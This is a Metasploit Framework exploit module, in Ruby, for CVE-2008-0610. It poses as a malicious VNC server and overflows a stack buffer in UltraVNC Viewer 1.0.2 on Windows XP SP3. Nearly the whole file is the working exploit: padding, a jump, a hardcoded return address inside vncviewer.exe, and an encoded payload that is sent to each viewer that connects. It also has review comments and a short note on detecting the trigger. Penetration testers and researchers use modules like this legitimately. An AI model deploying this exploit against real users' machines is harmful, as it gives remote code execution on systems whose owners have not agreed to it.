GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  # This module acts as a malicious VNC *server*: the TcpServer mixin listens
  # on SRVPORT and on_client_connect runs for each viewer that connects.
  include Msf::Exploit::Remote::TcpServer

  # Module metadata and options.
  #
  # @param info [Hash] module info merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release.

          If a malicious server responds to a client connection indicating a minor
          protocol version of 14 or 16, a 32-bit integer is subsequently read from
          the TCP stream by the client and directly provided as the trusted size for
          further reading from the TCP stream into a 1024-byte character array on
          the stack.
        },
        'Author' => 'noperand',
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2008-0610' ],
          [ 'OSVDB', '42840' ],
          [ 'BID', '27561' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Payload' => {
          # Upper bound on the encoded payload appended after the return address.
          'Space' => 500,
        },
        'Platform' => 'win',
        'Targets' => [
          # Single target; 'Ret' is an address inside the viewer binary itself, so
          # the module is tied to this exact vncviewer.exe build.
          [ 'Windows XP SP3', { 'Ret' => 0x00421a61 } ], # vncviewer.exe, 1.0.2
        ],
        'Privileged' => false,
        'DisclosureDate' => '2008-02-06',
        'DefaultTarget' => 0,
        # NOTE(review): reliability, stability and side-effect ratings are still
        # marked UNKNOWN; fill these in once the module has been re-tested.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # 5900 is the conventional VNC display :0 port, so a viewer pointed at this
    # host with no explicit display number connects here.
    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])
      ]
    )
  end

  # TcpServer callback, invoked once per connecting viewer. Builds the forged
  # RFB server greeting that triggers the trusted-size read described in the
  # module description, sends it, hands the socket to the payload handler and
  # then closes the client.
  #
  # @param client the connected viewer socket; this method calls put,
  #   getpeername and peerport on it
  # @return [nil] returns early, sending nothing, if no payload can be generated
  def on_client_connect(client)
    # NOTE(review): `p` is assigned but never read; the idiomatic guard is
    # `return unless regenerate_payload(client)`.
    return if ((p = regenerate_payload(client)) == nil)

    sploit = rand_text_alpha(1100) # junk, could be more efficient here
    sploit << "\x00\x04\x00\x00" # value to get around a write
    sploit << rand_text_alpha(12) # random junk
    sploit << "\xEB\x06" << make_nops(2) # short relative jump
    sploit << [target.ret].pack('V') # pop/pop/ret (default is in vncviewer.exe)
    sploit << payload.encoded

=begin
We prepend the initial 12 bytes including the server's desired protocol version ("RFB 003.016").
- These bytes are read directly by a call to ReadExact() with a size of 12.

Vulnerable viewer code (quoted from the UltraVNC 1.0.2 source):

...
if (m_minorVersion == 14 || m_minorVersion == 16)
{
int size;
ReadExact((char *)&size,sizeof(int));
char mytext[1024]; //10k
ReadExact(mytext,size);
mytext[size]=0;
...

If the minor version is 16 or 14, a 32-bit integer follows indicating the size of our data to read.
We then append our data.

Detection note: on the wire the trigger is a server greeting of "RFB 003.016\n"
(or 003.014) immediately followed by a 4-byte big-endian length field that the
viewer trusts without bounding it to its 1024-byte buffer.
=end
    # Greeting (12 bytes) + big-endian length of the rest + the buffer built above.
    sploit = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x31\x36\x0a" << [sploit.length].pack('N') << sploit

    print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
    client.put(sploit)
    handler(client)
    service.close_client(client)
  end
end